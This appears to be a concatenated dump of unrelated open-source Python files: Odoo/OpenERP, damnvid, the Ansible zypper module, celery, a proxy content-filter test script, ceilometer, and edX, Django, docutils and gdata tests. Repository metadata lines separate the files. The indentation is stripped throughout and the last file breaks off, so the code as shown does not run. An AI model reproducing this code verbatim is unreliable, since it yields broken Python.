# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
from tools.translate import _
import decimal_precision as dp
import time
class mrp_production_fixed_costs(osv.osv):
"""
Class that represents a production fixed costs
"""
_name = 'mrp.production.fixed.costs'
_columns = {
'name': fields.char('Description', size=128, required=True),
'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
'production_id': fields.many2one('mrp.production', 'Production', required=True),
'company_id': fields.many2one('res.company', 'Company')
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.users').browse(cr, uid, uid).company_id.id,
'production_id': lambda self, cr, uid, context: context.get('parent_id') and context['parent_id'] or False,
}
mrp_production_fixed_costs()
class mrp_production_add_fixed_costs(osv.osv):
_inherit = 'mrp.production'
_columns = {
'fixed_costs': fields.one2many('mrp.production.fixed.costs', 'production_id', 'Production fixed costs'),
}
mrp_production_add_fixed_costs()
|
agpl-3.0
|
zacoxicompton/damnvid
|
dCore.py
|
12
|
3195
|
# -*- coding: utf-8 -*-
def DamnUnicode(s):
if type(s) is type(u''):
return s
if type(s) is type(''):
try:
return unicode(s)
except:
try:
return unicode(s.decode('utf8'))
except:
try:
return unicode(s.decode('windows-1252')) # Windows file paths with accents and weird characters
except:
return unicode(s, errors='ignore')
try:
return unicode(s)
except:
try:
return DamnUnicode(str(s))
except:
return s
def DamnOpenFile(f, m):
f = DamnUnicode(f)
try:
return open(f, m)
except:
try:
return open(f.encode('utf8'), m)
except:
try:
return open(f.encode('windows-1252'), m)
except:
return open(f.encode('utf8', 'ignore'), m)
def DamnExecFile(f, globs={}, locs={}, addDV=True):
if addDV:
globs['DV'] = DV
locs['DV'] = DV
try:
execfile(DamnUnicode(f), globs, locs)
except:
try:
execfile(DamnUnicode(f).encode('utf8'), globs, locs)
except:
try:
execfile(DamnUnicode(f).encode('windows-1252'), globs, locs)
except:
try:
from dLog import Damnlog, DamnlogException
import sys
DamnlogException(*(sys.exc_info()))
Damnlog('Could not execute file', f)
except:
pass
def DamnVersionCompare(v1, v2): # Returns 1 if v1 is newer, 0 if equal, -1 if v2 is newer.
v1 = DamnUnicode(v1).split(u'.')
v2 = DamnUnicode(v2).split(u'.')
for i in range(len(v1)):
if len(v2) <= i:
return 1
if v1[i] != v2[i]:
return 2 * int(int(v1[i]) > int(v2[i])) - 1
if len(v1) != len(v2):
return 2 * (len(v1) > len(v2)) - 1
return 0
class DamnCurry:
# From http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52549
def __init__(self, func, *args, **kwargs):
self.func = func
self.pending = args[:]
self.kwargs = kwargs
def __str__(self):
return u'<DamnCurry of ' + DamnUnicode(self.func) + u'; args = ' + DamnUnicode(self.pending) + u'; kwargs = ' + DamnUnicode(self.kwargs) + u'>'
def __repr__(self):
return self.__str__()
def __call__(self, *args, **kwargs):
if kwargs and self.kwargs:
kw = self.kwargs.copy()
kw.update(kwargs)
else:
kw = kwargs or self.kwargs
return self.func(*(self.pending + args), **kw)
def DamnTempFile():
name = DV.tmp_path + DamnUnicode(random.random()) + '.tmp'
while os.path.exists(name):
name = DV.tmp_path + DamnUnicode(random.random()) + '.tmp'
Damnlog('Temp file requested. Return:', name)
return name
def DamnNothing(*args, **kwargs):
return
class DamnEmpty:
pass
class DamnDummy:
def __getitem__(self, key):
return self
def __getattr__(self, name):
return self
def __call__(self, *args, **kwargs):
return self
def __repr__(self):
return 'DamnDummy()'
def __str__(self):
return 'DamnDummy'
def __unicode__(self):
return u'DamnDummy'
DV = DamnEmpty()
def DamnOverridePath(prefix, otherwise=None):
global DV
prefix = DamnUnicode(prefix).lower()
for i in DV.argv:
if i[:len(prefix)].lower() == prefix:
result = i[len(prefix):]
if result[-1:] != DV.sep:
result += DV.sep
DV.argv = [x for x in DV.argv if x[:len(prefix)].lower() != prefix]
return result
if otherwise is not None:
return DamnUnicode(otherwise)
DV.postEvent = DamnNothing # Will be replaced by wx's events
|
gpl-3.0
|
h0nIg/ansible-modules-extras
|
packaging/os/zypper.py
|
20
|
11010
|
#!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <pmc@patrickcallahan.com>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <patrik.lundin.swe@gmail.com>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import re
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
- package name or package specifier with version C(name) or C(name-1.0). You can also pass a url or a local path to a rpm file.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
required: false
choices: [ present, latest, absent ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
- Whether to disable to GPG signature checking of the package
signature being installed. Has an effect only if state is
I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
disable_recommends:
version_added: "1.8"
description:
- Corresponds to the C(--no-recommends) option for I(zypper). Default behavior (C(yes)) modifies zypper's default behavior; C(no) does install recommended packages.
required: false
default: "yes"
choices: [ "yes", "no" ]
notes: []
# informational: requirements for nodes
requirements: [ zypper, rpm ]
'''
EXAMPLES = '''
# Install "nmap"
- zypper: name=nmap state=present
# Install apache2 with recommended packages
- zypper: name=apache2 state=present disable_recommends=no
# Remove the "nmap" package
- zypper: name=nmap state=absent
# Install the nginx rpm from a remote repo
- zypper: name=http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm state=present
# Install local rpm file
- zypper: name=/tmp/fancy-software.rpm state=present
'''
# Function used for getting zypper version
def zypper_version(module):
"""Return (rc, message) tuple"""
cmd = ['/usr/bin/zypper', '-V']
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
if rc == 0:
return rc, stdout
else:
return rc, stderr
# Function used for getting versions of currently installed packages.
def get_current_version(m, packages):
cmd = ['/bin/rpm', '-q', '--qf', '%{NAME} %{VERSION}-%{RELEASE}\n']
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
current_version = {}
rpmoutput_re = re.compile('^(\S+) (\S+)$')
for stdoutline in stdout.splitlines():
match = rpmoutput_re.match(stdoutline)
if match == None:
return None
package = match.group(1)
version = match.group(2)
current_version[package] = version
for package in packages:
if package not in current_version:
print package + ' was not returned by rpm \n'
return None
return current_version
# Function used to find out if a package is currently installed.
def get_package_state(m, packages):
for i in range(0, len(packages)):
# Check state of a local rpm-file
if ".rpm" in packages[i]:
# Check if rpm file is available
package = packages[i]
if not os.path.isfile(package) and not '://' in package:
stderr = "No Package file matching '%s' found on system" % package
m.fail_json(msg=stderr, rc=1)
# Get packagename from rpm file
cmd = ['/bin/rpm', '--query', '--qf', '%{NAME}', '--package']
cmd.append(package)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
packages[i] = stdout
cmd = ['/bin/rpm', '--query', '--qf', 'package %{NAME} is installed\n']
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
installed_state = {}
rpmoutput_re = re.compile('^package (\S+) (.*)$')
for stdoutline in stdout.splitlines():
match = rpmoutput_re.match(stdoutline)
if match == None:
continue
package = match.group(1)
result = match.group(2)
if result == 'is installed':
installed_state[package] = True
else:
installed_state[package] = False
return installed_state
# Function used to make sure a package is present.
def package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
packages = []
for package in name:
if package not in installed_state or installed_state[package] is False:
packages.append(package)
if len(packages) != 0:
cmd = ['/usr/bin/zypper', '--non-interactive']
# add global options before zypper command
if disable_gpg_check:
cmd.append('--no-gpg-checks')
cmd.extend(['install', '--auto-agree-with-licenses', '-t', package_type])
# add install parameter
if disable_recommends and not old_zypper:
cmd.append('--no-recommends')
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
if rc == 0:
changed=True
else:
changed=False
else:
rc = 0
stdout = ''
stderr = ''
changed=False
return (rc, stdout, stderr, changed)
# Function used to make sure a package is the latest available version.
def package_latest(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper):
# first of all, make sure all the packages are installed
(rc, stdout, stderr, changed) = package_present(m, name, installed_state, package_type, disable_gpg_check, disable_recommends, old_zypper)
# return if an error occured while installation
# otherwise error messages will be lost and user doesn`t see any error
if rc:
return (rc, stdout, stderr, changed)
# if we've already made a change, we don't have to check whether a version changed
if not changed:
pre_upgrade_versions = get_current_version(m, name)
cmd = ['/usr/bin/zypper', '--non-interactive']
if disable_gpg_check:
cmd.append('--no-gpg-checks')
if old_zypper:
cmd.extend(['install', '--auto-agree-with-licenses', '-t', package_type])
else:
cmd.extend(['update', '--auto-agree-with-licenses', '-t', package_type])
cmd.extend(name)
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
# if we've already made a change, we don't have to check whether a version changed
if not changed:
post_upgrade_versions = get_current_version(m, name)
if pre_upgrade_versions != post_upgrade_versions:
changed = True
return (rc, stdout, stderr, changed)
# Function used to make sure a package is not installed.
def package_absent(m, name, installed_state, package_type, old_zypper):
packages = []
for package in name:
if package not in installed_state or installed_state[package] is True:
packages.append(package)
if len(packages) != 0:
cmd = ['/usr/bin/zypper', '--non-interactive', 'remove', '-t', package_type]
cmd.extend(packages)
rc, stdout, stderr = m.run_command(cmd)
if rc == 0:
changed=True
else:
changed=False
else:
rc = 0
stdout = ''
stderr = ''
changed=False
return (rc, stdout, stderr, changed)
# ===========================================
# Main control flow
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True, aliases=['pkg'], type='list'),
state = dict(required=False, default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
type = dict(required=False, default='package', choices=['package', 'patch', 'pattern', 'product', 'srcpackage']),
disable_gpg_check = dict(required=False, default='no', type='bool'),
disable_recommends = dict(required=False, default='yes', type='bool'),
),
supports_check_mode = False
)
params = module.params
name = params['name']
state = params['state']
type_ = params['type']
disable_gpg_check = params['disable_gpg_check']
disable_recommends = params['disable_recommends']
rc = 0
stdout = ''
stderr = ''
result = {}
result['name'] = name
result['state'] = state
rc, out = zypper_version(module)
match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
if not match or int(match.group(1)) > 0:
old_zypper = False
else:
old_zypper = True
# Get package state
installed_state = get_package_state(module, name)
# Perform requested action
if state in ['installed', 'present']:
(rc, stdout, stderr, changed) = package_present(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)
elif state in ['absent', 'removed']:
(rc, stdout, stderr, changed) = package_absent(module, name, installed_state, type_, old_zypper)
elif state == 'latest':
(rc, stdout, stderr, changed) = package_latest(module, name, installed_state, type_, disable_gpg_check, disable_recommends, old_zypper)
if rc != 0:
if stderr:
module.fail_json(msg=stderr, rc=rc)
else:
module.fail_json(msg=stdout, rc=rc)
result['changed'] = changed
result['rc'] = rc
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
waseem18/oh-mainline
|
vendor/packages/celery/celery/concurrency/eventlet.py
|
18
|
3457
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import sys
from time import time
if not os.environ.get("EVENTLET_NOPATCH"):
import eventlet
import eventlet.debug
eventlet.monkey_patch()
eventlet.debug.hub_prevent_multiple_readers(False)
from .. import signals
from ..utils import timer2
from . import base
def apply_target(target, args=(), kwargs={}, callback=None,
accept_callback=None, getpid=None):
return base.apply_target(target, args, kwargs, callback, accept_callback,
pid=getpid())
class Schedule(timer2.Schedule):
def __init__(self, *args, **kwargs):
from eventlet.greenthread import spawn_after
from greenlet import GreenletExit
super(Schedule, self).__init__(*args, **kwargs)
self.GreenletExit = GreenletExit
self._spawn_after = spawn_after
self._queue = set()
def enter(self, entry, eta=None, priority=0):
try:
eta = timer2.to_timestamp(eta)
except OverflowError:
if not self.handle_error(sys.exc_info()):
raise
now = time()
if eta is None:
eta = now
secs = max(eta - now, 0)
g = self._spawn_after(secs, entry)
self._queue.add(g)
g.link(self._entry_exit, entry)
g.entry = entry
g.eta = eta
g.priority = priority
g.cancelled = False
return g
def _entry_exit(self, g, entry):
try:
try:
g.wait()
except self.GreenletExit:
entry.cancel()
g.cancelled = True
finally:
self._queue.discard(g)
def clear(self):
queue = self._queue
while queue:
try:
queue.pop().cancel()
except (KeyError, self.GreenletExit):
pass
@property
def queue(self):
return [(g.eta, g.priority, g.entry) for g in self._queue]
class Timer(timer2.Timer):
Schedule = Schedule
def ensure_started(self):
pass
def stop(self):
self.schedule.clear()
def cancel(self, tref):
try:
tref.cancel()
except self.schedule.GreenletExit:
pass
def start(self):
pass
class TaskPool(base.BasePool):
Timer = Timer
signal_safe = False
is_green = True
def __init__(self, *args, **kwargs):
from eventlet import greenthread
from eventlet.greenpool import GreenPool
self.Pool = GreenPool
self.getcurrent = greenthread.getcurrent
self.spawn_n = greenthread.spawn_n
super(TaskPool, self).__init__(*args, **kwargs)
def on_start(self):
self._pool = self.Pool(self.limit)
signals.eventlet_pool_started.send(sender=self)
def on_stop(self):
signals.eventlet_pool_preshutdown.send(sender=self)
if self._pool is not None:
self._pool.waitall()
signals.eventlet_pool_postshutdown.send(sender=self)
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, **_):
signals.eventlet_pool_apply.send(sender=self,
target=target, args=args, kwargs=kwargs)
self._pool.spawn_n(apply_target, target, args, kwargs,
callback, accept_callback,
self.getcurrent)
|
agpl-3.0
|
Dark-Passenger/Top_websites_content_filtering_test
|
website_access_single_user_no_report.py
|
1
|
2327
|
from __future__ import print_function, division
from requests import get
from lxml.html import fromstring
from datetime import datetime
from requests.exceptions import ConnectionError
from csv import reader
from itertools import islice
from os import system, name
filename = "top-1m.csv"
websites = reader(open(filename))
proxy = {
'http':'10.11.11.1:3128',
'https':'10.11.11.1:3128'
}
#setup counters
website_counter = 0
blocked_counter = 0
not_blocked_counter = 0
error_counter = 0
response_time = []
def Stats():
if name == 'nt':
system('cls')
else:
system('clear')
end_time = datetime.now().replace(microsecond=0)
duration = end_time - start_time
avg_response_time = sum(response_time)/len(response_time)
print("\n\t\t--Statistics--\n")
print("Total running time :\t\t", duration)
print("Total websites accessed :\t", website_counter)
print("Total websites blocked :\t", blocked_counter)
print("Total websites not blocked :\t", not_blocked_counter)
print("Totol websites closed with error :\t",error_counter)
print("Average Response time :\t",avg_response_time)
start_row = int(input("Starting row number: "))
end_row = int(input("Ending row number: "))
#Start calculating program running time
start_time = datetime.now().replace(microsecond=0)
for website in islice(websites, start_row, end_row):
website_name = "http://"+website[1]
website_counter = website_counter+1
try :
webpage = get(website_name, proxies=proxy)
site_map = fromstring(webpage.content)
response_time.append(webpage.elapsed.microseconds)
try:
#Site blocked
result = site_map.xpath('//*[@id="content"]/div[2]/div/div[2]/div[1]/h1/label//text()')[0]
site = site_map.xpath('//*[@id="content"]/div[2]/div/div[2]/div[1]/div/strong/text()[1]')[0]
category = site_map.xpath('//*[@id="content"]/div[2]/div/div[2]/div[1]/div/strong/text()')[1]
blocked_counter=blocked_counter + 1
except IndexError as e:
#Oops site not blocked
not_blocked_counter = not_blocked_counter + 1
except ConnectionError :
#connection error
error_counter = error_counter + 1
if website_counter % 10 == 0:
Stats()
Stats()
|
gpl-3.0
|
maestro-hybrid-cloud/ceilometer
|
ceilometer/alarm/evaluator/__init__.py
|
5
|
4879
|
#
# Copyright 2013 eNovance <licensing@enovance.com>
#
# Authors: Mehdi Abaakouk <mehdi.abaakouk@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import datetime
from ceilometerclient import client as ceiloclient
import croniter
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
import pytz
import six
from ceilometer.i18n import _, _LI
LOG = log.getLogger(__name__)
UNKNOWN = 'insufficient data'
OK = 'ok'
ALARM = 'alarm'
cfg.CONF.import_opt('http_timeout', 'ceilometer.service')
cfg.CONF.import_group('service_credentials', 'ceilometer.service')
@six.add_metaclass(abc.ABCMeta)
class Evaluator(object):
"""Base class for alarm rule evaluator plugins."""
def __init__(self, notifier):
self.notifier = notifier
self.api_client = None
@property
def _client(self):
"""Construct or reuse an authenticated API client."""
if not self.api_client:
auth_config = cfg.CONF.service_credentials
creds = dict(
os_auth_url=auth_config.os_auth_url,
os_region_name=auth_config.os_region_name,
os_tenant_name=auth_config.os_tenant_name,
os_password=auth_config.os_password,
os_username=auth_config.os_username,
os_cacert=auth_config.os_cacert,
os_endpoint_type=auth_config.os_endpoint_type,
insecure=auth_config.insecure,
timeout=cfg.CONF.http_timeout,
)
self.api_client = ceiloclient.get_client(2, **creds)
return self.api_client
def _refresh(self, alarm, state, reason, reason_data):
"""Refresh alarm state."""
try:
previous = alarm.state
if previous != state:
LOG.info(_LI('alarm %(id)s transitioning to %(state)s because '
'%(reason)s') % {'id': alarm.alarm_id,
'state': state,
'reason': reason})
self._client.alarms.set_state(alarm.alarm_id, state=state)
alarm.state = state
if self.notifier:
self.notifier.notify(alarm, previous, reason, reason_data)
except Exception:
# retry will occur naturally on the next evaluation
# cycle (unless alarm state reverts in the meantime)
LOG.exception(_('alarm state update failed'))
@classmethod
def within_time_constraint(cls, alarm):
"""Check whether the alarm is within at least one of its time limits.
If there are none, then the answer is yes.
"""
if not alarm.time_constraints:
return True
now_utc = timeutils.utcnow().replace(tzinfo=pytz.utc)
for tc in alarm.time_constraints:
tz = pytz.timezone(tc['timezone']) if tc['timezone'] else None
now_tz = now_utc.astimezone(tz) if tz else now_utc
start_cron = croniter.croniter(tc['start'], now_tz)
if cls._is_exact_match(start_cron, now_tz):
return True
# start_cron.cur has changed in _is_exact_match(),
# croniter cannot recover properly in some corner case.
start_cron = croniter.croniter(tc['start'], now_tz)
latest_start = start_cron.get_prev(datetime.datetime)
duration = datetime.timedelta(seconds=tc['duration'])
if latest_start <= now_tz <= latest_start + duration:
return True
return False
@staticmethod
def _is_exact_match(cron, ts):
"""Handle edge in case when both parameters are equal.
Handle edge case where if the timestamp is the same as the
cron point in time to the minute, croniter returns the previous
start, not the current. We can check this by first going one
step back and then one step forward and check if we are
at the original point in time.
"""
cron.get_prev()
diff = timeutils.total_seconds(ts - cron.get_next(datetime.datetime))
return abs(diff) < 60 # minute precision
@abc.abstractmethod
def evaluate(self, alarm):
"""Interface definition.
evaluate an alarm
alarm Alarm: an instance of the Alarm
"""
|
apache-2.0
|
jazkarta/edx-platform
|
common/lib/xmodule/xmodule/tests/test_import_static.py
|
208
|
1949
|
"""
Tests that check that we ignore the appropriate files when importing courses.
"""
import unittest
from mock import Mock
from xmodule.modulestore.xml_importer import import_static_content
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.tests import DATA_DIR
class IgnoredFilesTestCase(unittest.TestCase):
"Tests for ignored files"
def test_ignore_tilde_static_files(self):
course_dir = DATA_DIR / "tilde"
course_id = SlashSeparatedCourseKey("edX", "tilde", "Fall_2012")
content_store = Mock()
content_store.generate_thumbnail.return_value = ("content", "location")
import_static_content(course_dir, content_store, course_id)
saved_static_content = [call[0][0] for call in content_store.save.call_args_list]
name_val = {sc.name: sc.data for sc in saved_static_content}
self.assertIn("example.txt", name_val)
self.assertNotIn("example.txt~", name_val)
self.assertIn("GREEN", name_val["example.txt"])
def test_ignore_dot_underscore_static_files(self):
"""
Test for ignored Mac OS metadata files (filename starts with "._")
"""
course_dir = DATA_DIR / "dot-underscore"
course_id = SlashSeparatedCourseKey("edX", "dot-underscore", "2014_Fall")
content_store = Mock()
content_store.generate_thumbnail.return_value = ("content", "location")
import_static_content(course_dir, content_store, course_id)
saved_static_content = [call[0][0] for call in content_store.save.call_args_list]
name_val = {sc.name: sc.data for sc in saved_static_content}
self.assertIn("example.txt", name_val)
self.assertIn(".example.txt", name_val)
self.assertNotIn("._example.txt", name_val)
self.assertNotIn(".DS_Store", name_val)
self.assertIn("GREEN", name_val["example.txt"])
self.assertIn("BLUE", name_val[".example.txt"])
|
agpl-3.0
|
chyeh727/django
|
tests/template_tests/filter_tests/test_escape.py
|
324
|
1495
|
from django.template.defaultfilters import escape
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class EscapeTests(SimpleTestCase):
"""
The "escape" filter works the same whether autoescape is on or off,
but it has no effect on strings already marked as safe.
"""
@setup({'escape01': '{{ a|escape }} {{ b|escape }}'})
def test_escape01(self):
output = self.engine.render_to_string('escape01', {"a": "x&y", "b": mark_safe("x&y")})
self.assertEqual(output, "x&y x&y")
@setup({'escape02': '{% autoescape off %}{{ a|escape }} {{ b|escape }}{% endautoescape %}'})
def test_escape02(self):
output = self.engine.render_to_string('escape02', {"a": "x&y", "b": mark_safe("x&y")})
self.assertEqual(output, "x&y x&y")
# It is only applied once, regardless of the number of times it
# appears in a chain.
@setup({'escape03': '{% autoescape off %}{{ a|escape|escape }}{% endautoescape %}'})
def test_escape03(self):
output = self.engine.render_to_string('escape03', {"a": "x&y"})
self.assertEqual(output, "x&y")
@setup({'escape04': '{{ a|escape|escape }}'})
def test_escape04(self):
output = self.engine.render_to_string('escape04', {"a": "x&y"})
self.assertEqual(output, "x&y")
class FunctionTests(SimpleTestCase):
def test_non_string_input(self):
self.assertEqual(escape(123), '123')
|
bsd-3-clause
|
SnappleCap/oh-mainline
|
vendor/packages/docutils/test/test_parsers/test_rst/test_TableParser.py
|
18
|
6100
|
#! /usr/bin/env python
# coding: utf-8
# $Id: test_TableParser.py 7668 2013-06-04 12:46:30Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Tests for states.py.
"""
from __init__ import DocutilsTestSupport
def suite():
s = DocutilsTestSupport.GridTableParserTestSuite()
s.generateTests(totest)
return s
totest = {}
totest['grid_tables'] = [
["""\
+-------------------------------------+
| A table with one cell and one line. |
+-------------------------------------+
""",
[(0, 0, 2, 38, ['A table with one cell and one line.'])],
([37],
[],
[[(0, 0, 1, ['A table with one cell and one line.'])]])],
["""\
+--------------+--------------+
| A table with | two columns. |
+--------------+--------------+
""",
[(0, 0, 2, 15, ['A table with']),
(0, 15, 2, 30, ['two columns.'])],
([14, 14],
[],
[[(0, 0, 1, ['A table with']),
(0, 0, 1, ['two columns.'])]])],
# Combining chars in grid tables still fail
# [u"""\
# +--------------+------------------+
# | A taฬble wฬ
ith | combฬฒining chars. |
# +--------------+------------------+
# """,
# [(0, 0, 2, 15, [u'A table with']),
# (0, 15, 2, 30, [u'combining chars.'])],
# ([14, 14],
# [],
# [[(0, 0, 1, [u'A table with']),
# (0, 0, 1, [u'combining chars.'])]])],
["""\
+--------------+-------------+
| A table with | two columns |
+--------------+-------------+
| and | two rows. |
+--------------+-------------+
""",
[(0, 0, 2, 15, ['A table with']),
(0, 15, 2, 29, ['two columns']),
(2, 0, 4, 15, ['and']),
(2, 15, 4, 29, ['two rows.'])],
([14, 13],
[],
[[(0, 0, 1, ['A table with']),
(0, 0, 1, ['two columns'])],
[(0, 0, 3, ['and']),
(0, 0, 3, ['two rows.'])]])],
["""\
+--------------------------+
| A table with three rows, |
+------------+-------------+
| and two | columns. |
+------------+-------------+
| First and last rows |
| contain column spans. |
+--------------------------+
""",
[(0, 0, 2, 27, ['A table with three rows,']),
(2, 0, 4, 13, ['and two']),
(2, 13, 4, 27, ['columns.']),
(4, 0, 7, 27, ['First and last rows', 'contain column spans.'])],
([12, 13],
[],
[[(0, 1, 1, ['A table with three rows,']),
None],
[(0, 0, 3, ['and two']),
(0, 0, 3, ['columns.'])],
[(0, 1, 5, ['First and last rows', 'contain column spans.']),
None]])],
["""\
+------------+-------------+---------------+
| A table | two rows in | and row spans |
| with three +-------------+ to left and |
| columns, | the middle, | right. |
+------------+-------------+---------------+
""",
[(0, 0, 4, 13, ['A table', 'with three', 'columns,']),
(0, 13, 2, 27, ['two rows in']),
(0, 27, 4, 43, ['and row spans', 'to left and', 'right.']),
(2, 13, 4, 27, ['the middle,'])],
([12, 13, 15],
[],
[[(1, 0, 1, ['A table', 'with three', 'columns,']),
(0, 0, 1, ['two rows in']),
(1, 0, 1, ['and row spans', 'to left and', 'right.'])],
[None,
(0, 0, 3, ['the middle,']),
None]])],
["""\
+------------+-------------+---------------+
| A table | | two rows in | and funny |
| with 3 +--+-------------+-+ stuff. |
| columns, | the middle, | | |
+------------+-------------+---------------+
""",
[(0, 0, 4, 13, ['A table |', 'with 3 +--', 'columns,']),
(0, 13, 2, 27, ['two rows in']),
(0, 27, 4, 43, [' and funny', '-+ stuff.', ' |']),
(2, 13, 4, 27, ['the middle,'])],
([12, 13, 15],
[],
[[(1, 0, 1, ['A table |', 'with 3 +--', 'columns,']),
(0, 0, 1, ['two rows in']),
(1, 0, 1, [' and funny', '-+ stuff.', ' |'])],
[None,
(0, 0, 3, ['the middle,']),
None]])],
["""\
+-----------+-------------------------+
| W/NW cell | N/NE cell |
| +-------------+-----------+
| | Middle cell | E/SE cell |
+-----------+-------------+ |
| S/SE cell | |
+-------------------------+-----------+
""",
[(0, 0, 4, 12, ['W/NW cell', '', '']),
(0, 12, 2, 38, ['N/NE cell']),
(2, 12, 4, 26, ['Middle cell']),
(2, 26, 6, 38, ['E/SE cell', '', '']),
(4, 0, 6, 26, ['S/SE cell'])],
([11, 13, 11],
[],
[[(1, 0, 1, ['W/NW cell', '', '']),
(0, 1, 1, ['N/NE cell']),
None],
[None,
(0, 0, 3, ['Middle cell']),
(1, 0, 3, ['E/SE cell', '', ''])],
[(0, 1, 5, ['S/SE cell']),
None,
None]])],
["""\
+--------------+-------------+
| A bad table. | |
+--------------+ |
| Cells must be rectangles. |
+----------------------------+
""",
'TableMarkupError: Malformed table; parse incomplete.',
'TableMarkupError: Malformed table; parse incomplete.'],
["""\
+-------------------------------+
| A table with two header rows, |
+------------+------------------+
| the first | with a span. |
+============+==================+
| Two body | rows, |
+------------+------------------+
| the second with a span. |
+-------------------------------+
""",
[(0, 0, 2, 32, ['A table with two header rows,']),
(2, 0, 4, 13, ['the first']),
(2, 13, 4, 32, ['with a span.']),
(4, 0, 6, 13, ['Two body']),
(4, 13, 6, 32, ['rows,']),
(6, 0, 8, 32, ['the second with a span.'])],
([12, 18],
[[(0, 1, 1, ['A table with two header rows,']),
None],
[(0, 0, 3, ['the first']),
(0, 0, 3, ['with a span.'])]],
[[(0, 0, 5, ['Two body']),
(0, 0, 5, ['rows,'])],
[(0, 1, 7, ['the second with a span.']),
None]])],
["""\
+-------------------------------+
| A table with two head/body |
+=============+=================+
| row | separators. |
+=============+=================+
| That's bad. | |
+-------------+-----------------+
""",
'TableMarkupError: Multiple head/body row separators '
'(table lines 3 and 5); only one allowed.',
'TableMarkupError: Multiple head/body row separators '
'(table lines 3 and 5); only one allowed.'],
["""\
+-------------------------------------+
| |
+-------------------------------------+
""",
[(0, 0, 2, 38, [''])],
([37],
[],
[[(0, 0, 1, [''])]])],
]
if __name__ == '__main__':
import unittest
unittest.main(defaultTest='suite')
|
agpl-3.0
|
simonpatrick/bite-project
|
deps/gdata-python-client/tests/gdata_tests/apps/organization/live_client_test.py
|
22
|
5786
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Live client tests for the Organization Unit Provisioning API."""
# This module is used for version 2 of the Google Data APIs.
# These tests attempt to connect to Google servers.
__author__ = 'Gunjan Sharma <gunjansharma@google.com>'
import random
import unittest
import gdata.apps.organization.client
import gdata.apps.organization.data
import gdata.client
import gdata.data
import gdata.gauth
import gdata.test_config as conf
conf.options.register_option(conf.APPS_DOMAIN_OPTION)
class OrganizationUnitProvisioningClientTest(unittest.TestCase):
def setUp(self):
self.client = gdata.apps.organization.client.OrganizationUnitProvisioningClient(
domain='example.com')
if conf.options.get_value('runlive') == 'true':
